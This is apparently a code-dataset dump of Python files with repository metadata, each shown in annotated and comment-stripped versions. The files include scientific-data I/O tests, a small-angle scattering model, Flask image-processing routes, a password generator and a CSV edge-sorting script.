for j in range(ngr):
arr = newdat.X[group_idx[j], i]
stats[i, 3 + j * 2] = arr.mean()
stats[i, 3 + j * 2 + 1] = (arr > 0).sum() * 100.0 / arr.size
arr_list.append(arr)
stats[i, 0], stats[i, 1] = f_oneway(*arr_list)
if np.isnan(stats[i, 0]):
stats[i, 0] = 0.0
stats[i, 1] = 1.0
passed, stats[:, 2] = fdr(stats[:, 1])
cols = ["fstat", "pval", "qval"]
for i in range(ngr):
cols.extend([group_names[i] + "_mean", group_names[i] + "_percent"])
raw_results = pd.DataFrame(stats, columns=cols, index=gene_list)
results = raw_results[raw_results["qval"] <= fdr_alpha]
results = results.sort_values("qval")
if res_key is not None:
data.uns[res_key] = raw_results
data.obs[res_key] = "background"
for i in range(ngr):
idx = np.zeros(data.shape[0], dtype=bool)
idx[selected] = group_idx[i]
data.obs.loc[idx, res_key] = group_names[i]
return results
| true | true |
f7190fdf620a3e284b95e4499bf5b802e62fd1c4 | 247 | py | Python | contacts/permissions.py | neyona/underwaterfortunes | a48bedc7e25815dea87f743dae21d046d842c713 | [
"MIT"
] | null | null | null | contacts/permissions.py | neyona/underwaterfortunes | a48bedc7e25815dea87f743dae21d046d842c713 | [
"MIT"
] | 1 | 2020-05-21T13:54:06.000Z | 2020-05-21T13:54:06.000Z | contacts/permissions.py | neyona/underwaterfortunes-2020-version | a48bedc7e25815dea87f743dae21d046d842c713 | [
"MIT"
] | null | null | null | from rest_framework import permissions
class AllPostsPermissions(permissions.BasePermission):
    """Object-level permission that grants access only for POST requests."""

    # NOTE(review): the second parameter is conventionally named ``view`` in
    # DRF permission hooks -- confirm against callers before renaming.
    def has_object_permission(self, request, add, obj):
        # BUG FIX: the original returned ``self.create(request, *args, **kwargs)``,
        # which raised NameError (``args``/``kwargs`` were never defined) and
        # called a method permissions classes do not have.  A permission hook
        # must simply return a boolean.
        return request.method == "POST"
| 27.444444 | 56 | 0.716599 | from rest_framework import permissions
class AllPostsPermissions(permissions.BasePermission):
def has_object_permission(self, request, add, obj):
if request.method == "POST":
return self.create(request, *args, **kwargs)
| true | true |
f71911522998ef6b2724c6a05886367f69c73b79 | 4,438 | py | Python | test/test_series_io.py | waldo2590/thunder | 967ff8f3e7c2fabe1705743d95eb2746d4329786 | [
"Apache-2.0"
] | 650 | 2015-01-21T02:27:58.000Z | 2022-03-01T11:10:44.000Z | test/test_series_io.py | gopikasula/thunder | 967ff8f3e7c2fabe1705743d95eb2746d4329786 | [
"Apache-2.0"
] | 264 | 2015-01-20T21:32:41.000Z | 2021-02-28T15:39:01.000Z | test/test_series_io.py | gopikasula/thunder | 967ff8f3e7c2fabe1705743d95eb2746d4329786 | [
"Apache-2.0"
] | 179 | 2015-01-20T10:02:04.000Z | 2021-02-24T12:59:58.000Z | import pytest
import os
import glob
import json
from numpy import arange, array, allclose, save, savetxt
from bolt import array as barray
from thunder.series.readers import fromarray, fromtext, frombinary, fromexample
pytestmark = pytest.mark.usefixtures("eng")
def test_from_array(eng):
    """fromarray on a 2-D int16 ndarray preserves shape, dtype, index, values."""
    a = arange(8, dtype='int16').reshape((4, 2))
    data = fromarray(a, engine=eng)
    assert data.shape == (4, 2)
    assert data.dtype == 'int16'
    assert allclose(data.index, [0, 1])
    assert allclose(data.toarray(), a)
def test_from_array_bolt(eng):
    """fromarray accepts a bolt array, distributed (with engine) or local."""
    a = arange(8, dtype='int16').reshape((4, 2))
    if eng is not None:
        # distributed bolt array backed by the engine context
        b = barray(a, context=eng)
    else:
        # local-mode bolt array
        b = barray(a)
    data = fromarray(b, engine=eng)
    assert data.shape == (4, 2)
    assert data.dtype == 'int16'
    assert allclose(data.index, [0, 1])
    assert allclose(data.toarray(), a)
def test_from_array_vector(eng):
    """Same checks as a plain 2-D fromarray round trip.

    NOTE(review): this body is byte-for-byte identical to test_from_array and
    never builds a 1-D/vector input despite its name -- confirm intent or
    remove the duplication.
    """
    a = arange(8, dtype='int16').reshape((4, 2))
    data = fromarray(a, engine=eng)
    assert data.shape == (4, 2)
    assert data.dtype == 'int16'
    assert allclose(data.index, [0, 1])
    assert allclose(data.toarray(), a)
def test_from_array_index(eng):
    """A caller-supplied index overrides the default 0..n-1 index."""
    a = arange(8, dtype='int16').reshape((4, 2))
    data = fromarray(a, index=[2, 3], engine=eng)
    assert allclose(data.index, [2, 3])
def test_from_text(tmpdir, eng):
    """fromtext parses a whitespace-delimited text file into float64 records."""
    v = [[0, i] for i in range(10)]
    f = os.path.join(str(tmpdir), 'data.txt')
    savetxt(f, v, fmt='%.02g')
    data = fromtext(f, engine=eng)
    assert allclose(data.shape, (10, 2))
    assert data.dtype == 'float64'
    assert allclose(data.toarray(), v)
def test_from_text_skip(tmpdir):
    """skip=1 drops the leading key column from each text record.

    NOTE(review): unlike its siblings this test takes no ``eng`` fixture and
    calls fromtext without ``engine=`` -- confirm local-mode-only is intended.
    """
    k = [[i] for i in range(10)]
    v = [[0, i] for i in range(10)]
    a = [kv[0] + kv[1] for kv in zip(k, v)]  # prepend key column to each row
    f = os.path.join(str(tmpdir), 'data.txt')
    savetxt(f, a, fmt='%.02g')
    data = fromtext(f, skip=1)
    assert allclose(data.shape, (10, 2))
    assert data.dtype == 'float64'
    assert allclose(data.toarray(), v)
def test_from_binary(tmpdir, eng):
    """frombinary reads a flat binary file given explicit shape and dtype."""
    a = arange(8, dtype='int16').reshape((4, 2))
    p = os.path.join(str(tmpdir), 'data.bin')
    a.tofile(p)
    data = frombinary(p, shape=[4, 2], dtype='int16', engine=eng)
    assert allclose(data.shape, (4, 2))
    assert allclose(data.index, [0, 1])
    assert allclose(data.toarray(), a)
def test_from_binary_skip(tmpdir, eng):
    """skip=1 drops the leading key value from each binary record."""
    k = [[i] for i in range(10)]
    v = [[0, i] for i in range(10)]
    a = array([kv[0] + kv[1] for kv in zip(k, v)], dtype='int16')  # key + values
    p = os.path.join(str(tmpdir), 'data.bin')
    a.tofile(p)
    data = frombinary(p, shape=[10, 2], dtype='int16', skip=1, engine=eng)
    assert allclose(data.shape, (10, 2))
    assert allclose(data.index, [0, 1])
    assert allclose(data.toarray(), v)
def test_to_binary(tmpdir, eng):
    """tobinary writes one bin file per partition plus SUCCESS and conf.json."""
    a = arange(8, dtype='int16').reshape((4, 2))
    p = str(tmpdir) + '/data'
    fromarray(a, npartitions=1, engine=eng).tobinary(p)
    files = [os.path.basename(f) for f in glob.glob(str(tmpdir) + '/data/*')]
    assert sorted(files) == ['SUCCESS', 'conf.json', 'series-00000.bin']
    # conf.json must record the original shape and dtype for reloading.
    with open(str(tmpdir) + '/data/conf.json', 'r') as f:
        conf = json.load(f)
    assert conf['shape'] == [4, 2]
    assert conf['dtype'] == 'int16'
def test_to_binary_roundtrip(tmpdir, eng):
    """Data survives a tobinary/frombinary round trip.

    NOTE(review): frombinary is called without ``engine=eng`` -- presumably
    reloading in local mode is acceptable here; confirm.
    """
    a = arange(8, dtype='int16').reshape((4, 2))
    p = str(tmpdir) + '/data'
    data = fromarray(a, npartitions=1, engine=eng)
    data.tobinary(p)
    loaded = frombinary(p)
    assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_partitioned(tmpdir, eng):
    """Round trip is lossless when the data spans multiple partitions."""
    a = arange(8, dtype='int16').reshape((4, 2))
    p = str(tmpdir) + '/data'
    data = fromarray([a, a], npartitions=4, engine=eng)
    data.tobinary(p)
    loaded = frombinary(p)
    assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_3d(tmpdir, eng):
    """Round trip is lossless for 3-D data."""
    a = arange(16, dtype='int16').reshape((4, 2, 2))
    p = str(tmpdir) + '/data'
    data = fromarray(a, npartitions=1, engine=eng)
    data.tobinary(p)
    loaded = frombinary(p, engine=eng)
    assert allclose(data.toarray(), loaded.toarray())
def test_from_example(eng):
    """Load the bundled example datasets and check their shapes."""
    # BUG FIX: the original started with a bare ``return``, which made the test
    # silently pass without running anything.  Skip explicitly so reports show
    # it as skipped rather than (vacuously) green.
    pytest.skip("example-dataset checks disabled (require data download)")
    data = fromexample('fish', engine=eng)
    assert allclose(data.toarray().shape, (76, 87, 2, 20))
    data = fromexample('mouse', engine=eng)
    assert allclose(data.toarray().shape, (64, 64, 20))
    data = fromexample('iris', engine=eng)
    assert allclose(data.toarray().shape, (150, 4))
| 31.475177 | 79 | 0.627084 | import pytest
import os
import glob
import json
from numpy import arange, array, allclose, save, savetxt
from bolt import array as barray
from thunder.series.readers import fromarray, fromtext, frombinary, fromexample
pytestmark = pytest.mark.usefixtures("eng")
def test_from_array(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_bolt(eng):
a = arange(8, dtype='int16').reshape((4, 2))
if eng is not None:
b = barray(a, context=eng)
else:
b = barray(a)
data = fromarray(b, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_vector(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_index(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, index=[2, 3], engine=eng)
assert allclose(data.index, [2, 3])
def test_from_text(tmpdir, eng):
v = [[0, i] for i in range(10)]
f = os.path.join(str(tmpdir), 'data.txt')
savetxt(f, v, fmt='%.02g')
data = fromtext(f, engine=eng)
assert allclose(data.shape, (10, 2))
assert data.dtype == 'float64'
assert allclose(data.toarray(), v)
def test_from_text_skip(tmpdir):
k = [[i] for i in range(10)]
v = [[0, i] for i in range(10)]
a = [kv[0] + kv[1] for kv in zip(k, v)]
f = os.path.join(str(tmpdir), 'data.txt')
savetxt(f, a, fmt='%.02g')
data = fromtext(f, skip=1)
assert allclose(data.shape, (10, 2))
assert data.dtype == 'float64'
assert allclose(data.toarray(), v)
def test_from_binary(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = os.path.join(str(tmpdir), 'data.bin')
a.tofile(p)
data = frombinary(p, shape=[4, 2], dtype='int16', engine=eng)
assert allclose(data.shape, (4, 2))
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_binary_skip(tmpdir, eng):
k = [[i] for i in range(10)]
v = [[0, i] for i in range(10)]
a = array([kv[0] + kv[1] for kv in zip(k, v)], dtype='int16')
p = os.path.join(str(tmpdir), 'data.bin')
a.tofile(p)
data = frombinary(p, shape=[10, 2], dtype='int16', skip=1, engine=eng)
assert allclose(data.shape, (10, 2))
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), v)
def test_to_binary(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
fromarray(a, npartitions=1, engine=eng).tobinary(p)
files = [os.path.basename(f) for f in glob.glob(str(tmpdir) + '/data/*')]
assert sorted(files) == ['SUCCESS', 'conf.json', 'series-00000.bin']
with open(str(tmpdir) + '/data/conf.json', 'r') as f:
conf = json.load(f)
assert conf['shape'] == [4, 2]
assert conf['dtype'] == 'int16'
def test_to_binary_roundtrip(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
data = fromarray(a, npartitions=1, engine=eng)
data.tobinary(p)
loaded = frombinary(p)
assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_partitioned(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
data = fromarray([a, a], npartitions=4, engine=eng)
data.tobinary(p)
loaded = frombinary(p)
assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_3d(tmpdir, eng):
a = arange(16, dtype='int16').reshape((4, 2, 2))
p = str(tmpdir) + '/data'
data = fromarray(a, npartitions=1, engine=eng)
data.tobinary(p)
loaded = frombinary(p, engine=eng)
assert allclose(data.toarray(), loaded.toarray())
def test_from_example(eng):
return
data = fromexample('fish', engine=eng)
assert allclose(data.toarray().shape, (76, 87, 2, 20))
data = fromexample('mouse', engine=eng)
assert allclose(data.toarray().shape, (64, 64, 20))
data = fromexample('iris', engine=eng)
assert allclose(data.toarray().shape, (150, 4))
| true | true |
f719124569af67768775e9d2f1c0b713b0b7a884 | 4,855 | py | Python | sasmodels/models/pearl_necklace.py | jmborr/sasmodels | bedb9b0fed4f3f4bc2bbfa5878de6f2b6fdfbcc9 | [
"BSD-3-Clause"
] | null | null | null | sasmodels/models/pearl_necklace.py | jmborr/sasmodels | bedb9b0fed4f3f4bc2bbfa5878de6f2b6fdfbcc9 | [
"BSD-3-Clause"
] | null | null | null | sasmodels/models/pearl_necklace.py | jmborr/sasmodels | bedb9b0fed4f3f4bc2bbfa5878de6f2b6fdfbcc9 | [
"BSD-3-Clause"
] | 1 | 2021-04-28T14:21:17.000Z | 2021-04-28T14:21:17.000Z | r"""
This model provides the form factor for a pearl necklace composed of two
elements: *N* pearls (homogeneous spheres of radius *R*) freely jointed by *M*
rods (like strings - with a total mass *Mw* = *M* \* *m*\ :sub:`r` + *N* \* *m*\
:sub:`s`, and the string segment length (or edge separation) *l*
(= *A* - 2\ *R*)). *A* is the center-to-center pearl separation distance.
.. figure:: img/pearl_necklace_geometry.jpg
Pearl Necklace schematic
Definition
----------
The output of the scattering intensity function for the pearl_necklace is
given by (Schweins, 2004)
.. math::
I(q)=\frac{ \text{scale} }{V} \cdot \frac{(S_{ss}(q)+S_{ff}(q)+S_{fs}(q))}
{(M \cdot m_f + N \cdot m_s)^2} + \text{bkg}
where
.. math::
S_{ss}(q) &= sm_s^2\psi^2(q)[\frac{N}{1-sin(qA)/qA}-\frac{N}{2}-
\frac{1-(sin(qA)/qA)^N}{(1-sin(qA)/qA)^2}\cdot\frac{sin(qA)}{qA}] \\
S_{ff}(q) &= sm_r^2[M\{2\Lambda(q)-(\frac{sin(ql/2)}{ql/2})\}+
\frac{2M\beta^2(q)}{1-sin(qA)/qA}-2\beta^2(q)\cdot
\frac{1-(sin(qA)/qA)^M}{(1-sin(qA)/qA)^2}] \\
S_{fs}(q) &= m_r \beta (q) \cdot m_s \psi (q) \cdot 4[
\frac{N-1}{1-sin(qA)/qA}-\frac{1-(sin(qA)/qA)^{N-1}}{(1-sin(qA)/qA)^2}
\cdot \frac{sin(qA)}{qA}] \\
\psi(q) &= 3 \cdot \frac{sin(qR)-(qR)\cdot cos(qR)}{(qR)^3} \\
\Lambda(q) &= \frac{\int_0^{ql}\frac{sin(t)}{t}dt}{ql} \\
\beta(q) &= \frac{\int_{qR}^{q(A-R)}\frac{sin(t)}{t}dt}{ql}
where the mass *m*\ :sub:`i` is (SLD\ :sub:`i` - SLD\ :sub:`solvent`) \*
(volume of the *N* pearls/rods). *V* is the total volume of the necklace.
The 2D scattering intensity is the same as $P(q)$ above, regardless of the
orientation of the *q* vector.
The returned value is scaled to units of |cm^-1| and the parameters of the
pearl_necklace model are the following
NB: *num_pearls* must be an integer.
References
----------
R Schweins and K Huber, *Particle Scattering Factor of Pearl Necklace Chains*,
*Macromol. Symp.* 211 (2004) 25-42 2004
"""
from numpy import inf, pi
name = "pearl_necklace"
title = "Colloidal spheres chained together with no preferential orientation"
description = """
Calculate form factor for Pearl Necklace Model
[Macromol. Symp. 2004, 211, 25-42]
Parameters:
background:background
scale: scale factor
sld: the SLD of the pearl spheres
sld_string: the SLD of the strings
sld_solvent: the SLD of the solvent
num_pearls: number of the pearls
radius: the radius of a pearl
edge_sep: the length of string segment; surface to surface
thick_string: thickness (ie, diameter) of the string
"""
category = "shape:cylinder"
# ["name", "units", default, [lower, upper], "type","description"],
parameters = [["radius", "Ang", 80.0, [0, inf], "volume",
"Mean radius of the chained spheres"],
["edge_sep", "Ang", 350.0, [0, inf], "volume",
"Mean separation of chained particles"],
["thick_string", "Ang", 2.5, [0, inf], "volume",
"Thickness of the chain linkage"],
["num_pearls", "none", 3, [1, inf], "volume",
"Number of pearls in the necklace (must be integer)"],
["sld", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chained spheres"],
["sld_string", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chain linkage"],
["sld_solvent", "1e-6/Ang^2", 6.3, [-inf, inf], "sld",
"Scattering length density of the solvent"],
]
source = ["lib/sas_Si.c", "lib/sas_3j1x_x.c", "pearl_necklace.c"]
single = False # use double precision unless told otherwise
def volume(radius, edge_sep, thick_string, num_pearls):
    """
    Calculates the total particle volume of the necklace.
    Redundant with form_volume.
    """
    n_pearls = int(num_pearls + 0.5)   # round to the nearest integer count
    n_strings = n_pearls - 1.0
    # each string segment is a cylinder of length edge_sep
    string_vol = edge_sep * pi * (thick_string / 2.0) ** 2.0
    # each pearl is a sphere of the given radius
    pearl_vol = 4.0 / 3.0 * pi * radius ** 3.0
    return n_strings * string_vol + n_pearls * pearl_vol
def ER(radius, edge_sep, thick_string, num_pearls):
    """
    Calculation for effective radius.
    """
    n_pearls = int(num_pearls + 0.5)   # round to the nearest integer count
    total_vol = volume(radius, edge_sep, thick_string, n_pearls)
    # radius of the sphere with the same total volume as the necklace
    return (total_vol / (4.0 / 3.0 * pi)) ** (1. / 3.)
# parameters for demo
demo = dict(scale=1, background=0, radius=80.0, edge_sep=350.0,
num_pearls=3, sld=1, sld_solvent=6.3, sld_string=1,
thick_string=2.5,
radius_pd=.2, radius_pd_n=5,
edge_sep_pd=25.0, edge_sep_pd_n=5,
num_pearls_pd=0, num_pearls_pd_n=0,
thick_string_pd=0.2, thick_string_pd_n=5,
)
tests = [[{}, 0.001, 17380.245], [{}, 'ER', 115.39502]]
| 37.346154 | 80 | 0.612976 |
from numpy import inf, pi
name = "pearl_necklace"
title = "Colloidal spheres chained together with no preferential orientation"
description = """
Calculate form factor for Pearl Necklace Model
[Macromol. Symp. 2004, 211, 25-42]
Parameters:
background:background
scale: scale factor
sld: the SLD of the pearl spheres
sld_string: the SLD of the strings
sld_solvent: the SLD of the solvent
num_pearls: number of the pearls
radius: the radius of a pearl
edge_sep: the length of string segment; surface to surface
thick_string: thickness (ie, diameter) of the string
"""
category = "shape:cylinder"
parameters = [["radius", "Ang", 80.0, [0, inf], "volume",
"Mean radius of the chained spheres"],
["edge_sep", "Ang", 350.0, [0, inf], "volume",
"Mean separation of chained particles"],
["thick_string", "Ang", 2.5, [0, inf], "volume",
"Thickness of the chain linkage"],
["num_pearls", "none", 3, [1, inf], "volume",
"Number of pearls in the necklace (must be integer)"],
["sld", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chained spheres"],
["sld_string", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chain linkage"],
["sld_solvent", "1e-6/Ang^2", 6.3, [-inf, inf], "sld",
"Scattering length density of the solvent"],
]
source = ["lib/sas_Si.c", "lib/sas_3j1x_x.c", "pearl_necklace.c"]
single = False
def volume(radius, edge_sep, thick_string, num_pearls):
num_pearls = int(num_pearls + 0.5)
number_of_strings = num_pearls - 1.0
string_vol = edge_sep * pi * pow((thick_string / 2.0), 2.0)
pearl_vol = 4.0 /3.0 * pi * pow(radius, 3.0)
total_vol = number_of_strings * string_vol
total_vol += num_pearls * pearl_vol
return total_vol
def ER(radius, edge_sep, thick_string, num_pearls):
num_pearls = int(num_pearls + 0.5)
tot_vol = volume(radius, edge_sep, thick_string, num_pearls)
rad_out = (tot_vol/(4.0/3.0*pi)) ** (1./3.)
return rad_out
demo = dict(scale=1, background=0, radius=80.0, edge_sep=350.0,
num_pearls=3, sld=1, sld_solvent=6.3, sld_string=1,
thick_string=2.5,
radius_pd=.2, radius_pd_n=5,
edge_sep_pd=25.0, edge_sep_pd_n=5,
num_pearls_pd=0, num_pearls_pd_n=0,
thick_string_pd=0.2, thick_string_pd_n=5,
)
tests = [[{}, 0.001, 17380.245], [{}, 'ER', 115.39502]]
| true | true |
f719129263fd17bc4e3b23fe0f051e771ce36bbd | 1,835 | py | Python | demo_site/routes.py | ArtemiiH/ppl_eraser_demo_site | 42555a3c74abc434c1ad7ff62cddc822d0a35ce8 | [
"MIT"
] | null | null | null | demo_site/routes.py | ArtemiiH/ppl_eraser_demo_site | 42555a3c74abc434c1ad7ff62cddc822d0a35ce8 | [
"MIT"
] | null | null | null | demo_site/routes.py | ArtemiiH/ppl_eraser_demo_site | 42555a3c74abc434c1ad7ff62cddc822d0a35ce8 | [
"MIT"
] | null | null | null | import urllib
from io import BytesIO
import requests
from flask import (Blueprint, current_app, jsonify, make_response,
render_template, request)
from .helpers import prepare_image_for_json
bp = Blueprint('routes', __name__, url_prefix='')
@bp.route('/', methods=['GET'])
def home():
    """Render the landing page."""
    return render_template('home.html')
@bp.route('/inpaint', methods=['GET', 'POST'])
def inpaint():
    """Serve the inpaint page on GET; on POST forward the uploaded image to
    the backing API's inpaint endpoint and relay its JSON response."""
    if request.method == 'POST':
        payload = {'image': prepare_image_for_json(request.files['image'])}
        endpoint = current_app.config.get('INPAINT_API_URL') + 'api/inpaint'
        api_response = requests.post(endpoint, json=payload, timeout=60)
        return make_response(jsonify(api_response.json()), 200)
    elif request.method == 'GET':
        return render_template('inpaint.html')
@bp.route('/cut', methods=['GET', 'POST'])
def cut():
    """Serve the cut page on GET; on POST forward the uploaded image to the
    backing API's cut endpoint and relay its JSON response.

    NOTE(review): near-duplicate of the other image routes -- a shared helper
    parameterized by endpoint/template would remove the repetition.
    """
    if request.method == 'POST':
        prepared_image = prepare_image_for_json(request.files['image'])
        # local name shadows ``json`` (here it is the request payload dict)
        json = {'image': prepared_image}
        url = current_app.config.get('INPAINT_API_URL') + 'api/cut'
        api_response = requests.post(
            url, json=json, timeout=60)
        return make_response(jsonify(api_response.json()), 200)
    elif request.method == 'GET':
        return render_template('cut.html')
@bp.route('/mask', methods=['GET', 'POST'])
def mask():
    """Serve the mask page on GET; on POST forward the uploaded image to the
    backing API's mask endpoint and relay its JSON response.

    NOTE(review): near-duplicate of the other image routes -- a shared helper
    parameterized by endpoint/template would remove the repetition.
    """
    if request.method == 'POST':
        prepared_image = prepare_image_for_json(request.files['image'])
        # local name shadows ``json`` (here it is the request payload dict)
        json = {'image': prepared_image}
        url = current_app.config.get('INPAINT_API_URL') + 'api/mask'
        api_response = requests.post(
            url, json=json, timeout=60)
        return make_response(jsonify(api_response.json()), 200)
    elif request.method == 'GET':
        return render_template('mask.html')
| 33.363636 | 71 | 0.646866 | import urllib
from io import BytesIO
import requests
from flask import (Blueprint, current_app, jsonify, make_response,
render_template, request)
from .helpers import prepare_image_for_json
bp = Blueprint('routes', __name__, url_prefix='')
@bp.route('/', methods=['GET'])
def home():
return render_template('home.html')
@bp.route('/inpaint', methods=['GET', 'POST'])
def inpaint():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/inpaint'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('inpaint.html')
@bp.route('/cut', methods=['GET', 'POST'])
def cut():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/cut'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('cut.html')
@bp.route('/mask', methods=['GET', 'POST'])
def mask():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/mask'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('mask.html')
| true | true |
f719132b31b09ec071c7f06ba0c074e2c1965b39 | 560 | py | Python | password generator.py | JoseRoberto1506/Password-generator | 47045b6a2de4dd609874dfce0077e9e30ac5cade | [
"MIT"
] | null | null | null | password generator.py | JoseRoberto1506/Password-generator | 47045b6a2de4dd609874dfce0077e9e30ac5cade | [
"MIT"
] | null | null | null | password generator.py | JoseRoberto1506/Password-generator | 47045b6a2de4dd609874dfce0077e9e30ac5cade | [
"MIT"
] | null | null | null | from string import ascii_letters, digits
from secrets import choice

# Prompt (pt-BR): "How many characters do you want the password to have?"
length = int(input("Você deseja uma senha de quantos caracteres? "))
# "[\\]" spells the three characters [, \, ] -- the original "[\]" relied on
# an invalid escape sequence that Python 3.12+ flags with a SyntaxWarning.
special_characters = "!#$%&()*+,-./:;<=>?@[\\]_{|}."
characters = ascii_letters + special_characters + digits
# A valid password needs one character from each of the four classes below,
# so anything shorter than 4 would make the sampling loop spin forever.
if length < 4:
    raise ValueError("Password length must be at least 4 characters.")
while True:
    # Rejection sampling: keep drawing until the candidate contains a
    # lowercase letter, an uppercase letter, a digit and a special character.
    password = ''.join(choice(characters) for _ in range(length))
    if (any(c.islower() for c in password) and
        any(c.isupper() for c in password) and
        any(c.isdigit() for c in password) and
        any(sc in special_characters for sc in password)):
        break
print(password)
| 32.941176 | 68 | 0.666071 | from string import ascii_letters, digits
from secrets import choice
lenght = int(input("Você deseja uma senha de quantos caracteres? "))
special_characters = "!#$%&()*+,-./:;<=>?@[\]_{|}."
characters = ascii_letters + special_characters + digits
while True:
password = ''.join(choice(characters) for i in range (lenght))
if (any(c.islower() for c in password) and
any(c.isupper() for c in password) and
any(c.isdigit() for c in password) and
any(sc in special_characters for sc in password)):
break
print(password)
| true | true |
f71913c1c96aa7dfd421ab759af0daac0e1f61ed | 1,109 | py | Python | mono2micro/ebc-application/ebc-data_dependencies/dynamic_dependencies/order_dependencies.py | jahn18/Normalized-TurboMQ | f44d85dca15d86a82e15b083072e05698135e479 | [
"MIT"
] | null | null | null | mono2micro/ebc-application/ebc-data_dependencies/dynamic_dependencies/order_dependencies.py | jahn18/Normalized-TurboMQ | f44d85dca15d86a82e15b083072e05698135e479 | [
"MIT"
] | null | null | null | mono2micro/ebc-application/ebc-data_dependencies/dynamic_dependencies/order_dependencies.py | jahn18/Normalized-TurboMQ | f44d85dca15d86a82e15b083072e05698135e479 | [
"MIT"
] | null | null | null | import csv
import sys
def orderEdges(fileName):
    """Load dependency edges from ``fileName`` and return them sorted by weight.

    Each CSV row's first cell holds whitespace-separated fields; rows are
    sorted ascending by the integer found at field index 2.

    Parameters
    ----------
    fileName : str
        Path of the CSV file of dynamic dependencies.

    Returns
    -------
    list[list[str]]
        The parsed edges, sorted in place via ``insertionSort``.
    """
    # BUG FIX: the original opened the file and never closed it; ``with``
    # guarantees the handle is released even if parsing raises.
    with open(fileName) as dynamic_dependencies_file:
        csv_reader = csv.reader(dynamic_dependencies_file)
        list_of_edges = [row[0].split() for row in csv_reader]
    return insertionSort(list_of_edges)
def writeCSV(sortedList, fileName):
    """Write the given rows to ``fileName`` as CSV (one row per edge)."""
    with open(fileName, "w") as out_file:
        csv_writer = csv.writer(out_file)
        for row in sortedList:
            csv_writer.writerow(row)
def insertionSort(list_of_values):
    """Sort the rows in place, ascending by the integer at field index 2,
    and return the same list.

    NOTE(review): despite its name this is a *selection* sort driven by
    ``findMin``; the public name is kept for compatibility.
    """
    for position in range(len(list_of_values)):
        smallest = findMin(position, list_of_values)
        list_of_values[position], list_of_values[smallest] = (
            list_of_values[smallest],
            list_of_values[position],
        )
    return list_of_values
def findMin(i, list_of_values):
    """Return the index of the row with the smallest integer weight
    (field index 2) among ``list_of_values[i:]``; ties keep the earliest."""
    best = i
    for candidate in range(i + 1, len(list_of_values)):
        # strict < keeps the first occurrence on ties, like the original
        if int(list_of_values[candidate][2]) < int(list_of_values[best][2]):
            best = candidate
    return best
if __name__ == "__main__":
    # CLI usage: python order_dependencies.py <dynamic_dependencies.csv>
    # Reads the given edge file and writes the weight-sorted edges to
    # 'sorted_edges.csv' in the current working directory.
    fileName = sys.argv[1]
    sortedList = orderEdges(fileName)
    writeCSV(sortedList, 'sorted_edges.csv')
| 29.972973 | 83 | 0.680794 | import csv
import sys
def orderEdges(fileName):
    """Read edge rows from *fileName* and return them sorted ascending by
    the integer weight in column 2."""
    # NOTE(review): the file handle is never closed -- consider "with".
    dynamic_dependencies_file = open(fileName)
    csv_reader = csv.reader(dynamic_dependencies_file)
    list_of_edges = []
    for row in csv_reader:
        # Each CSV row holds one whitespace-separated "src dst weight" string.
        list_of_edges.append(row[0].split())
    sortedList = insertionSort(list_of_edges)
    return sortedList
def writeCSV(sortedList, fileName):
    """Write the given rows to *fileName* in CSV format."""
    with open(fileName, "w") as f:
        writer = csv.writer(f)
        writer.writerows(sortedList)
def insertionSort(list_of_values):
    """Sort rows in place by ascending integer weight (column 2) and
    return the same list.

    NOTE(review): despite the name, this is a selection sort.
    """
    for i in range(len(list_of_values)):
        j = findMin(i, list_of_values)
        list_of_values[i], list_of_values[j] = list_of_values[j], list_of_values[i]
    return list_of_values
def findMin(i, list_of_values):
    """Return the index of the row with the smallest integer weight
    (column 2) among list_of_values[i:]; ties keep the lowest index."""
    smallest_value = int(list_of_values[i][2])
    index = i
    for j in range(i, len(list_of_values)):
        if int(list_of_values[j][2]) < smallest_value:
            index = j
            smallest_value = int(list_of_values[j][2])
    return index
# Command-line entry point: sort the edge file given as argv[1] by weight
# and write the result to sorted_edges.csv in the working directory.
if __name__ == "__main__":
    fileName = sys.argv[1]
    sortedList = orderEdges(fileName)
    writeCSV(sortedList, 'sorted_edges.csv')
| true | true |
